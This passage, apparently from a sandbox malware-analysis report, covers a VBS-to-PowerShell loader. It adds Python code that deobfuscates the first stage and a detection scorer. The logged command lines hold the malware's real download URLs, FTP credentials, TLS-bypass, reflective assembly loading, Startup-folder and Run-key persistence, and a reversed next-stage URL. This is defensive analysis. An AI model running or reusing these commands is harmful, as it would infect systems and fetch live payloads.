'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [ch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
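The entries above record every piece of the first stage: the wscript.exe AMSI buffer shows a PowerShell string built from quoted fragments glued together with [char]65 (the letter A), the later powershell.exe AMSI buffer shows the stub that base64-decodes that string, reverses it with $acwwn[-1..-$acwwn.Length] -join '' and substitutes the script path for the %XRqhI% placeholder, and the second-stage command line shows what comes out. The Python below is an added example, not code from the report or from the sample. It re-implements that unwrapping on the first 86 terms of the logged expression (the capture is truncated, so only a prefix of the embedded script is recoverable; the base64 decodes to UTF-16LE text, which is what [Text.Encoding]::Unicode.GetString would yield), and because the script stores its next-stage URL character-reversed it also scans the decoded text in both reading directions for URLs. The second-stage helper reproduces the Replace('?:?','A') step from the later command line on a constructed blob, since the real assembly is not on the page. SCRIPT_PATH is the path the report shows; the sample PE bytes are made up.

```python
from __future__ import annotations

import base64
import re

# Path the stub substitutes for the '%XRqhI%' placeholder (taken from the report).
SCRIPT_PATH = r"C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"

# First 86 terms of the logged expression, copied from the AMSI entry above.
# The sandbox capture is truncated, so only a prefix of the script decodes.
OBFUSCATED = (
    "'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + "
    "'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + "
    "'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + "
    "'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + "
    "'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + "
    "'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + "
    "'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + "
    "'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + "
    "'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + "
    "'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + "
    "'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + "
    "'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + "
    "'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + "
    "'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + "
    "'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + "
    "'t' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + "
    "'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + "
    "'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + "
    "'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + "
    "'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + "
    "'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + "
    "'C' + [char]65 + '' + [char]65"
)

# Constructed stand-in for the '?:?'-masked base64 blob the second stage fetches.
# Not the real assembly, which the report does not contain.
SAMPLE_PE_BYTES = b"MZ\x90\x00" + b"constructed stand-in, not a real assembly"
SAMPLE_MASKED = base64.b64encode(SAMPLE_PE_BYTES).decode().replace("A", "?:?")

_TERM = re.compile(r"'([^']*)'|\[char\](\d+)")   # one 'literal' or one [char]N term
_URL = re.compile(r"https?://[^\s'\"]+")


def evaluate_concat(expr: str) -> str:
    """Evaluate a PowerShell '+' chain made only of 'literal' and [char]N terms."""
    return "".join(chr(int(num)) if num else lit for lit, num in _TERM.findall(expr))


def decode_stage1(expr: str, script_path: str = SCRIPT_PATH) -> str:
    """Mirror the stub: FromBase64String -> UTF-16LE text -> reverse -> path substitution."""
    b64 = evaluate_concat(expr)
    b64 = b64[: len(b64) - len(b64) % 4]   # drop the incomplete quartet left by truncation
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]   # UTF-16 code units are two bytes each
    return raw.decode("utf-16-le")[::-1].replace("%XRqhI%", script_path)


def find_urls(script: str) -> list[str]:
    """URLs read forwards and backwards: the script keeps its next-stage URL reversed."""
    return sorted(set(_URL.findall(script)) | set(_URL.findall(script[::-1])))


def unmask_stage2(blob: str) -> bytes:
    """Undo the second stage's Replace('?:?','A') and base64-decode the assembly bytes."""
    return base64.b64decode(blob.replace("?:?", "A"))


if __name__ == "__main__":
    script = decode_stage1(OBFUSCATED)
    print(script)                       # tail of the second-stage command line
    print(find_urls(script))            # the reversed URL, read the right way round
    print(unmask_stage2(SAMPLE_MASKED)[:2] == b"MZ")
```

Run as a script it prints the recovered tail, which is exactly the end of the second-stage command line above (the Invoke call with the reversed URL, $huUPX and 'D DD'), so the two entries are the same script before and after unwrapping; the recovered URL is the next-stage host to block alongside the FTP server and the Google Drive IDs visible in the command line.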
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
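Taken together with the AMSI stub, the process-creation entries above carry several independent signals a command-line detection can key on without decoding anything: dense [char] concatenation, FromBase64String next to a negative-range string reversal, powershell invoked on a variable, -ExecutionPolicy Bypass with -WindowStyle Hidden running a .ps1 from a user-writable LocalLow path, a ServerCertificateValidationCallback that returns $true, AppDomain.Load of a byte array, a Copy-Item into the Startup folder, and a string-reversed URL ('//:sptth'). The scorer below is an added example, not a rule from the report; the indicator weights and the threshold are mine, and the sample inputs are abridged copies of the logged command lines plus one constructed benign line for contrast.

```python
from __future__ import annotations

import re

# Abridged copies of the command lines logged above, plus a constructed benign one.
SAMPLES = {
    "stage1": (
        "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command "
        "\"$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 "
        "+ 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65\""
    ),
    "stage1_stub": (
        "FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';"
        "$acwwn = $acwwn.replace('%XRqhI%','C:\\Users\\user\\Desktop\\SKMBT_77122012816310TD0128_17311_XLS.vbs');"
        "powershell $acwwn"
    ),
    "stage2": (
        "powershell.exe \"; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
        "Copy-Item 'C:\\Users\\user\\Desktop\\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination "
        "( $MYnKZ + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup' ) -force ;"
        "[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );"
        "[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1')"
        ".GetMethod( 'prFVI' ).Invoke( $null , [object[]] "
        "( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );\""
    ),
    "stage3": (
        "Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman "
        "\". 'C:\\Users\\user\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\hwcrj.ps1' \";exit"
    ),
    "benign": (
        "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -Command "
        "\"Get-Service | Where-Object Status -eq 'Running'\""
    ),
}

# (name, weight, pattern, minimum number of matches). Weights are my own choices.
INDICATORS = [
    ("char_concat",             5, re.compile(r"\[char\]\d+"), 5),
    ("string_reversal",         2, re.compile(r"\[-1\.\.-\$\w+\.Length\]"), 1),
    ("base64_decode",           2, re.compile(r"FromBase64String", re.I), 1),
    ("variable_invocation",     2, re.compile(r"\bpowershell\s+\$\w+", re.I), 1),
    ("exec_policy_bypass",      2, re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 1),
    ("hidden_window",           1, re.compile(r"-WindowStyle\s+Hidden", re.I), 1),
    ("user_writable_script",    2, re.compile(r"\\AppData\\(?:Local|Roaming)\\[^\"']*\.ps1", re.I), 1),
    ("tls_validation_disabled", 3, re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I), 1),
    ("reflective_load",         3, re.compile(r"AppDomain\]::CurrentDomain\.Load\s*\(|Assembly\]::Load\s*\(", re.I), 1),
    ("startup_persistence",     3, re.compile(r"Copy-Item\b.*Start Menu\\Programs\\Startup", re.I), 1),
    ("reversed_url",            3, re.compile(r"//:s?ptth", re.I), 1),
]


def triage(cmdline: str) -> tuple[int, list[str]]:
    """Return (score, names of indicators that fired) for one command line or script buffer."""
    hits = [name for name, _, pat, need in INDICATORS if len(pat.findall(cmdline)) >= need]
    score = sum(weight for name, weight, _, _ in INDICATORS if name in hits)
    return score, hits


def is_suspicious(cmdline: str, threshold: int = 5) -> bool:
    """Flag anything at or above the threshold; a single heavy [char] chain is enough."""
    return triage(cmdline)[0] >= threshold


if __name__ == "__main__":
    for label, line in SAMPLES.items():
        score, hits = triage(line)
        print(f"{label:12} score={score:2} suspicious={is_suspicious(line)!s:5} {hits}")
```

Two points worth keeping in mind when adapting this: the malware spells the parameter -Comman, so anchor patterns on the flags that matter (-ExecutionPolicy, -WindowStyle) rather than on -Command, and score the AMSI script buffer as well as the process command line, because the base64 and reversal logic only appears in the former.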
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 20_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347B0000 push esp; retf 4810h2_2_00007FFD347B01E3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347B708C push esi; retf 2_2_00007FFD347B71B7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B00BD pushad ; iretd 4_2_00007FFD345B00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0108 push ds; ret 4_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0513 push eax; iretd 4_2_00007FFD345B053E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B018D push ds; ret 4_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B05F5 push es; iretd 4_2_00007FFD345B061E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0347 push esi; ret 4_2_00007FFD345B0376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B2358 push cs; ret 4_2_00007FFD345B2366
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B0327 pushad ; ret 4_2_00007FFD345B0346
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD345B06F0 push edi; ret 4_2_00007FFD345B070E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD346823A3 push 8B485F94h; iretd 4_2_00007FFD346823AB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD3468235D push 8B485F94h; retf 4_2_00007FFD34682365
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3449D2A5 pushad ; iretd 5_2_00007FFD3449D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B00BD pushad ; iretd 5_2_00007FFD345B00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0108 push ds; ret 5_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B851B push ebx; ret 5_2_00007FFD345B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0513 push eax; iretd 5_2_00007FFD345B053E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B84DD push ebx; ret 5_2_00007FFD345B851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B84DD push ebx; ret 5_2_00007FFD345B85AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B018D push ds; ret 5_2_00007FFD345B01B6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0680 push ss; iretd 5_2_00007FFD345B071E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0347 push esi; ret 5_2_00007FFD345B0376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B0327 pushad ; ret 5_2_00007FFD345B0346
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345B06FF push ss; iretd 5_2_00007FFD345B071E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3448D2A5 pushad ; iretd 6_2_00007FFD3448D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A5CFA push ebp; ret 6_2_00007FFD345A5D16
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A85DD push ebx; ret 6_2_00007FFD345A861A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345AAB77 push esp; retf 6_2_00007FFD345AAB78
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD345A8433 push ebx; ret 6_2_00007FFD345A843A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD345B00BD pushad ; iretd 13_2_00007FFD345B00C1

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00406EEB ShellExecuteW,URLDownloadToFileW,20_2_00406EEB

                    Boot Survival

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuw cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuw

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
